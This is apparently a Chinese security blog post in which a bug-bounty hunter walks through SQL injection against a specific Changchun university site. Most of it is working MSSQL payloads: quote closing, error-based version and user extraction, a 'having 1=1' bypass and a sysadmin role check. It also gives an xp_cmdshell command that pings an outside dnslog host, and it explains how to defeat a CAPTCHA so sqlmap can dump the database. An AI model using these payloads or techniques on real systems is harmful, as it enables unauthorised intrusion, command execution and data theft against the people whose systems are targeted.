最近挖洞有了一些感悟,挖洞和渗透测试到底有那些不同呢?
1.
2022-01-18:22:13,有些累了,躺床上,群友发来一个edu某理工大学的证书站,问是不是有注入,发图让帮忙看看,
本来以为就是常规的mssql的except,看了图才知道是sqli,标准的引号不完整,标准的堆栈sqlexception,
然后哥几个怎么也没能闭合,最近挖逻辑有了一些新的思考,我拿到手后,看到’)<24觉得挺奇怪,为啥会存在不等符号?
构造’",发现语句多了个datediff函数
这样看就能看出来username后面跟了个datediff,引号没闭合导致后面2022前面的引号出了问题。
2. 闭合语句
mssql的闭合有三种 – a --+ ‘’
#号在mssql是不是用的,,构造payload:
’ and 1=@@version – a 看下版本
08的机子,看下数据库用户,1’ and 1=user-+
到这里,又有了一个手法,,mssql数据库里dbo是不是数据库管理员’db_owner’呢?
挖洞很多时候看的是知识面。但如果说这个db_owner权限不只是数据库管理员,而是sa权限呢?
所以下面没有着急爆数据和内容,测试了一下权限。
支持堆叠注入,那么到这里,从渗透的角度,基本能rce了
,宣告一个shell到手。。具体可以看上次的文章
https://blog.youkuaiyun.com/qq_29437513/article/details/122137756
但我们关注于效率,挖到证书即可。
3.having 1=1
mssql having 1=1这个手法可以快速的爆出数据库当前用的表和字段。
但在这里,出错了
’ having 1=1-- a
了解到mssql having 1=1 手法的原理,比如说
select * from id where id= '‘having 1=1-- a’ 这不存在问题,但实际挖洞情况目标环境各色各异。这时候我发现
’ having 1=1 and ‘C’='C绕过了,不报错了,
然后从这里看到当前数据库的核心表dbo.LoginRecord,然后尝试 group by 下一个字段,发现失败了,
fa 返回内容说明这库里只有logintime这一个字段? 但这很明显不符合逻辑的,这时候我又注意到,,堆栈下面的报错
Insert插入当前表loginrecord,(所以这也算一个报核心表的姿势),发现存在loginpwd,loginname,loginip这三个字段,但这些是前端属性,他们不是数据库的字段。。
4.报错注入的一些缺陷
cch从开始就看到,我们都知道报错注入基于mssql的字段基本都是nvchar字符,转化为整型,失败引发的结果。
dd但如果需要判断 整型的字符 比如 dba
payload ’ and 1=(is_svcrole(‘sysadmin’)) 在这里没有回显,那么,是不是就错过了一个sa?
先用sa权限来个dnslog玩玩,
’ exec xpcmdshell ‘ping y2n3hn.dnslog.cn’–+
5.sqlmap手法
zzz这种站点存在验证码刷新机制,,
sqlmap应该如何处理呢?
zz这里发现服务器放回500时,验证码不会刷新,也就是说,构造payload带着’ 就能绕过验证码的机制,实现sqlmap dump,,
测试带入’的内容,发现sqlmap自动闭合了,然后后面的pyload测试全部失效,,这里带入了all test,
qq取消all test 的测试后,sqlmap已经能识别到我想要的时间盲注
盲注的手法相对报错注入来说,兼容的多,半小时内就可以dump出结果来,
长春某理工大学证书到手了,
w站在挖洞的角度,多关心挖洞的效率,,只是做一个抛砖引玉,,
扫一扫
1305
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
